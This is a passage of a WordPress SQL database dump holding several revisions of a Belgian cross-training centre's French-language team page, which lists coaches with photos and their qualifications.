style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:39:55', '2013-07-03 19:39:55', '', 20, 'http://www.crosstrainingcenter.be/?p=244', 0, 'revision', '', 0),
(245, 1, '2013-07-03 19:41:42', '2013-07-03 19:41:42', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"162\" height=\"211\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"180\" height=\"235\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"180\" height=\"233\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:41:42', '2013-07-03 19:41:42', '', 20, 'http://www.crosstrainingcenter.be/?p=245', 0, 'revision', '', 0),
(246, 1, '2013-07-03 19:42:52', '2013-07-03 19:42:52', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:42:52', '2013-07-03 19:42:52', '', 20, 'http://www.crosstrainingcenter.be/?p=246', 0, 'revision', '', 0),
(247, 1, '2013-07-03 19:44:26', '2013-07-03 19:44:26', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:44:26', '2013-07-03 19:44:26', '', 20, 'http://www.crosstrainingcenter.be/?p=247', 0, 'revision', '', 0),
(248, 1, '2013-07-03 19:47:43', '2013-07-03 19:47:43', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting Formateur coach</h5>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:47:43', '2013-07-03 19:47:43', '', 20, 'http://www.crosstrainingcenter.be/?p=248', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(249, 1, '2013-07-03 19:48:41', '2013-07-03 19:48:41', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting<br>\r\nFormateur coach<br>\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a 